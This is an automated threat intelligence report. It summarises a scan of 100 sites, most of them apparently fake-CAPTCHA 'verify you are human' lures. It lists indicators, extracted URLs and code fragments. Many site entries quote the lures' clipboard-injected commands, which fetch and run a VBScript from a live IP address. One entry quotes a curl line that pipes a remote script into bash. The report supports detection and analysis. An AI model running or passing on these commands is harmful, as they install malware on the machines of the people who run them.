Threat Intelligence Report

πŸ“… January 24, 2026 πŸ•’ Generated: 2026-01-24 02:51:58 πŸ” Sites Analyzed: 100
⬇️ Download JSON Report πŸ“ View All Reports on GitHub
🌐
100
Total Sites Analyzed
⚠️
63
Malicious Sites
63.0% detection rate
πŸ’»
28
PowerShell Commands
πŸ“‹
285
Clipboard Hijacks
πŸ“Š
557
Avg Threat Score

Attack Pattern Analysis

61
High Risk Commands
284
Base64 Encoded
0
Obfuscated JS
35
Inline JS Redirects
10
External JS Chains
30
Redirect Follows
PowerShell Commands 28
Clipboard Hijacks 285
Base64 Encoded 284
CAPTCHA Elements 153
High Risk Commands 61
JS Redirects 35

Top Indicators/Keywords

hidden (17) robot (16) Robot (14) verification (14) Verification (13) Verification ID (12) Ray ID (12) I am not a robot (12) Verify you are human (12) CAPTCHA Verification (11) verification-id (11) Checking if you are human (11) To better prove you are not a robot (11) const command = (11) cmd (8)

Malicious Sites Detected

Click on a site to view detailed analysis
https://3.18.128.17/
791 indicators detected
Score: 6077 Redirect Chain
5
base64
3
redirect chains
3
redirect follows
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 63

https://gmpg.org/xfn/11
https://3.18.128.17/feed/
https://3.18.128.17/comments/feed/
https://api.w.org/
https://3.18.128.17/wp-json/

πŸ” External JavaScript Redirect Chains

Showing first 2 of 3 chains (truncated for performance)

Script: https://3.18.128.17/wp-content/plugins/wpvr/public/js/video.js?ver=1
Type: script_src
Destination (first appearance): https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Script: https://3.18.128.17/wp-content/plugins/wpvr/public/lib/videojs-vr/videojs-vr.js?ver=1
Type: base64_payload
Destination (first appearance): https://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…

πŸ›°οΈ Redirect Follower Findings (3)

Source: external_js
Method: script_src
d in
 
 
         var script = document.createElement('script');
         script.src = this.options_['vtt.js'] || 'https://vjs.zencdn.net/vttjs/0.14.1/vtt.min.js';
 
         script.onload = function () {
           /**
            * Fired …
Status: ok
/* videojs-vtt.js - v0.14.1 (https://github.com/gkatsev/vtt.js) built on 10-04-2018 */
!function(a){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=a();else if("function"==typeof define&&define.amd)define([],a);else{var b;b="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this,b.vttjs=a()}}(function(){return function a(b,c,d){function e(g,h){if(!c[g]){if(!b[g]){var i="function"==typeof require&&require;if(!h&&i)return i(g,!0... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.w3.org/2000/svg
<?xml version="1.0" encoding="UTF-8" standalone="no"?>
<svg width="198px" height="240px" viewBox="0 0 198 240" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:sketch="http://www.bohemiancodi…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
  <title>SVG namespace</title>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
  <link rel="stylesheet" type="text/css"
        href="https://www.w3.org/StyleSheets/TR/base"/>
</head>
<body>
<div class="head">
<p><a href="https://www.w3.org/"><img class="head"
src="https://www.w3.org/assets/logos/w3c/w3c-no-bars.svg" alt="W3C"/></a></p>
</div>
<p>
<strong>http://www.w3.org/2000/svg</strong> is an XML namespace, first defined in the 
... [truncated]
Source: external_js
Method: base64_payload
Chain: http://www.videolan.org/x264.html
 ftypmp42isomiso2avc1mp41freemdatEH, #x264 - core 142 r2479 dd79a61 - H.264/MPEG-4 AVC codec - Copyleft 2003-2014 - http://www.videolan.org/x264.html - options: cabac=1 ref=1 deblock=1:0:0 analyse=0x1:0x111 me=hex subme=2…
Status: ok
    <!DOCTYPE html>
    <html lang="en" >
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
                    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
            <meta name="viewport" content="width=device-width, initial-scale=1" />
        
        <meta name="Author" content="VideoLAN" />
        <meta name="Keywords" content=
        "VideoLAN, VLC, VLC player, VLC media player, download, media player, player download, codec, encoder, m... [truncated]
https://44.208.147.17/
543 indicators detected
Score: 3839
7
base64
1
redirects
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 79

https://gmpg.org/xfn/11
https://44.208.147.17/feed/
https://44.208.147.17/comments/feed/
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F
https://44.208.147.17/wp-json/oembed/1.0/embed?url=https%3A%2F%2F44.208.147.17%2F&#038;format=xml
http://31.147.204.35/
745 indicators detected
Score: 2151 Redirect Chain
14
base64
1
redirects
1
redirect chains
1
redirect follows
4
suspicious keywords

πŸ” Suspicious Keywords 4

robot
Robot
verification
hidden

🌐 Extracted URLs 556

https://circlear.grad.hr/
https://izin-abg-awak.b-cdn.net/grad.html
https://circlear.grad.hr/
https://cdn.kaptenluffy.com/ai/dpr87.png
https://cdn.kaptenluffy.com/ai/dpr87.png

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://cdn.jsdelivr.net/npm/disable-devtool@latest
Type: location_assignment
Destination (first appearance): https://theajack.github.io/disable-devtool/404.html?h=
dow.close(),window.history.back()}catch(e){console.log(e)}setTimeout(function(){window.location.href=d.timeOutUrl||"https://theajack.github.io/disable-devtool/404.html?h=".concat(encodeURIComponent(location.host))},500)}}var d={md5:"",ondev…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: location_assignment
dow.close(),window.history.back()}catch(e){console.log(e)}setTimeout(function(){window.location.href=d.timeOutUrl||"https://theajack.github.io/disable-devtool/404.html?h=".concat(encodeURIComponent(location.host))},500)}}var d={md5:"",ondev…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Not allowed</title>
</head>
<body style="text-align: center;margin-top: 100px;">
    <div">
        <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600" style="visibility: visible; max-width: 400px;">
            <g>
              <defs>
                <clipPath id="GlassClip">
 ... [truncated]
https://31.147.204.35/
745 indicators detected
Score: 2151 Redirect Chain
14
base64
1
redirects
1
redirect chains
1
redirect follows
4
suspicious keywords

πŸ” Suspicious Keywords 4

robot
Robot
verification
hidden

🌐 Extracted URLs 556

https://circlear.grad.hr/
https://izin-abg-awak.b-cdn.net/grad.html
https://circlear.grad.hr/
https://cdn.kaptenluffy.com/ai/dpr87.png
https://cdn.kaptenluffy.com/ai/dpr87.png

πŸ” External JavaScript Redirect Chains

Showing first 1 of 1 chains (truncated for performance)

Script: https://cdn.jsdelivr.net/npm/disable-devtool@latest
Type: location_assignment
Destination (first appearance): https://theajack.github.io/disable-devtool/404.html?h=
dow.close(),window.history.back()}catch(e){console.log(e)}setTimeout(function(){window.location.href=d.timeOutUrl||"https://theajack.github.io/disable-devtool/404.html?h=".concat(encodeURIComponent(location.host))},500)}}var d={md5:"",ondev…

πŸ›°οΈ Redirect Follower Findings (1)

Source: external_js
Method: location_assignment
dow.close(),window.history.back()}catch(e){console.log(e)}setTimeout(function(){window.location.href=d.timeOutUrl||"https://theajack.github.io/disable-devtool/404.html?h=".concat(encodeURIComponent(location.host))},500)}}var d={md5:"",ondev…
Status: ok
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Not allowed</title>
</head>
<body style="text-align: center;margin-top: 100px;">
    <div">
        <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600" style="visibility: visible; max-width: 400px;">
            <g>
              <defs>
                <clipPath id="GlassClip">
 ... [truncated]
https://5.63.157.201/
98 indicators detected
Score: 2021 Redirect Chain
6
base64
1
redirects
1
redirect follows
5
suspicious keywords

πŸ” Suspicious Keywords 5

exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } eise if (n.appName == "Netscape") { rv = ii; re = new RegExp("Trident/.*rv:([0-9]+[\.0-9]*)"); if (re.exec(ua) != nuii) { rv = parseFioat(RegExp.$i); } } } return rv; } })(window, document, navigator)
robot
verification
exec(
hidden

🌐 Extracted URLs 22

https://alfavit-obuv.ru/include/logo.png
https://alfavit-obuv.ru/
https://mc.yandex.ru/watch/55085083
https://5.63.157.201/
https://api.whatsapp.com/send/?phone=79168411253

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: script_src
{ return; }}
   k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})
   (window, document, "script", "https://mc.yandex.ru/metrika/tag.js", "ym");

   ym(55085083, "init", {
        clickmap…
Status: ok
(function(){var p;function aa(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var ba="function"==typeof Object.defineProperties?Object.defineProperty:function(a,b,c){if(a==Array.prototype||a==Object.prototype)return a;a[b]=c.value;return a};
function ca(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw... [truncated]
https://104.199.248.167/
95 indicators detected
Score: 1201 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
20
suspicious keywords
4
high risk

πŸ” Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info
https://104.199.248.167/
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://104.199.248.167/
95 indicators detected
Score: 1201 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
20
suspicious keywords
4
high risk

πŸ” Suspicious Keywords 20

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 7

https://t.me/Tarnkappe_info
http://104.199.248.167/
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://tesllamacapp.com/
87 indicators detected
Score: 904 PowerShell Clipboard Hijack
1
powershell
5
clipboard
6
captcha
13
base64
1
redirect follows
13
suspicious keywords

πŸ’» PowerShell Commands 1

curl

πŸ” Suspicious Keywords 13

command box */
Command </button>
command prompt.</strong>
command beiow:</strong>
Command = cmdEiement.getAttribute('data-reai-command');
command copied
captcha verification
robot
Verification
verification-ioader

🌐 Extracted URLs 5

https://icloud.com/security/verify
https://api.ipify.org?format=json
https://api.ipify.org?format=json
https://api.myip.com
https://httpbin.org/ip

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 5 entries (truncated for performance) 

...igator.clipboard && window.isSecureContext) { navigator.clipboard.writeText(textToCopy).then(() => { if (button) {...
...tArea.select(); try { const successful = document.execCommand('copy'); if (successful) { const button = even...

πŸ›°οΈ Redirect Follower Findings (1)

Source: inline_js
Method: base64_payload
curl -s http://217.119.139.117/d/roberto32100 | nohup bash &
Status: error: HTTPConnectionPool(host='217.119.139.117', port=80): Max retries exceeded with url: /d/roberto32100 (Caused by ConnectTimeoutError(<HTTPConnection(host='217.119.139.117', port=80) at 0x7f7b09fe
https://3.71.235.243/
330 indicators detected
Score: 903
1
base64
3
suspicious keywords

πŸ” Suspicious Keywords 3

robot
Robot
hidden

🌐 Extracted URLs 146

https://gmpg.org/xfn/11
https://3.71.235.243/feed/
https://3.71.235.243/comments/feed/
https://3.71.235.243/magaza/feed/
https://3.71.235.243/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.11.14
https://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://77.120.165.2/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://202.154.5.83:9092/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://65.49.82.3/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/wk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://208.109.244.121/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/wk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://88.198.19.78/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/dk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://174.142.195.203/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://104.219.248.200/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://74.50.99.45:8443/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://i98.i3.i58.i27:5506/ny.vbs",0:h.Send:Execute h.ResponseText > "%temp%\\ny.vbs" && "%temp%\\ny.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://t.me/Tarnkappe_info
https://i.postimg.cc/k4zrz92z/111.png
http://198.13.158.127:5506/ny.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
http://208.109.244.121:8000/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/wk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\wk.vbs" && "%temp%\wk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/wk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...
https://162.240.31.67/
75 indicators detected
Score: 735 Clipboard Hijack Fake CAPTCHA
6
clipboard
3
captcha
2
base64
19
suspicious keywords
3
high risk

πŸ” Suspicious Keywords 19

cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
command = 'cmd /c echo Set h=CreateObject("WinHttp.WinHttpRequest.5.i"):h.Open "GET","http://78.40.209.i64:5506/dk.vbs",0:h.Send:Execute h.ResponseText > "%temp%\dk.vbs" && "%temp%\dk.vbs"';
CAPTCHA Verification
Verification ID
Ray ID
I am not a robot
Robot
robot
Verification
verification

🌐 Extracted URLs 6

https://matrix.cymru/s/cloudflarechallenge
https://i.postimg.cc/k4zrz92z/111.png
http://78.40.209.164:5506/dk.vbs
https://www.google.com/s2/favicons?sz=128&domain=${encodeURIComponent
https://icons.duckduckgo.com/ip3/${encodeURIComponent

πŸ“‹ Clipboard Manipulation Code

Showing first 2 of 6 entries (truncated for performance) 

...ea); textarea.select(); try { document.execCommand('copy'); } catch(e) { /* ignore */ } document....
...ntDefault(); if (e.clipboardData) { e.clipboardData.setData('text/plain', command); } else if (window.clip...

Showing top 20 malicious sites. 30 additional sites detected.